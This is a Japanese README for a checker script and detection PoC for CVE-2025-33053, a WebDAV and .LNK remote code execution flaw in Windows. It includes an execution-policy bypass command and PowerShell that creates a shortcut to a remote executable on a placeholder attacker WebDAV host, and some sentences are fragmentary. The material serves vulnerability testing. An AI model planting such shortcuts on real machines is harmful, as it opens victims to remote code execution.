
チェッカーの証明
PoCの証明
Windows システムに影響を与える、WebDAV ベースの重要なリモートコード実行 (RCE) 脆弱性 CVE-2025-33053 の悪用可能性をチェックし、実証するためのツール一式です。
CVE-2025-33053 は、攻撃者が悪意のあるリモート WebDAV 共有を参照する .LNK ショートカットファイルを悪用し、影響を受けるシステム上でリモートコード実行 (RCE) を引き起こす可能性を許容します。
.LNK ファイルを介してアクセスされた場合でも、UNC パスを WebDAV 経由で解決 する必要があること。.LNK ファイル、または直接の UNC パスアクセス — 次のようなリモート UNC パスを指します:.LNK にアクセスするか、UNC パスを手動で参照すると(例:エクスプローラー経由):
CVE-2025-33053_checker.ps1)| チェック項目 | 目的 |
|---|---|
| 🔍 WebClient サービスの状態 | WebDAV サポートがアクティブで実行中かを確認します。 |
| 🔍 Test-Path による UNC パス処理 | システムがリモート WebDAV UNC パスを解決するかどうかをテストします(CVE 悪用の主要な前提条件)。 |
PowerShell を管理者として開きます。
スクリプトの実行が制限されている場合は、次を実行します:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
機能:
使用方法:
python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ 実際の UNC パス解決を使用 — シミュレーションではありません。 ✔️ OS によってトリガーされた実際の PROPFIND リクエストをキャプチャ — CVE 悪用に必要な正確な動作です。 ✔️ ペイロードを実行したり害を及ぼしたりすることなく、実際のネットワークレベルの脆弱性の証拠を示します。
この PoC は対象システムを悪用したり害したりするものではなく、基盤となる脆弱な動作を検出するだけです。 管理された環境または明示的な許可を得た上で使用することを意図しています。 実際のシステム動作を示すものであり、モックシミュレーションではありません。 教育目的のみに使用してください。許可されていないシステムでは実行しないでください。
MIT ライセンス — 教育、研究、防御目的のみ無料で使用できます。
プルリクエスト歓迎 — 検出の改善、機能追加、修正提案など。
このリポジトリは 教育および許可されたセキュリティ研究のみを目的としています。 所有していない、またはテストする許可がないシステムでの悪用は固く禁じられています。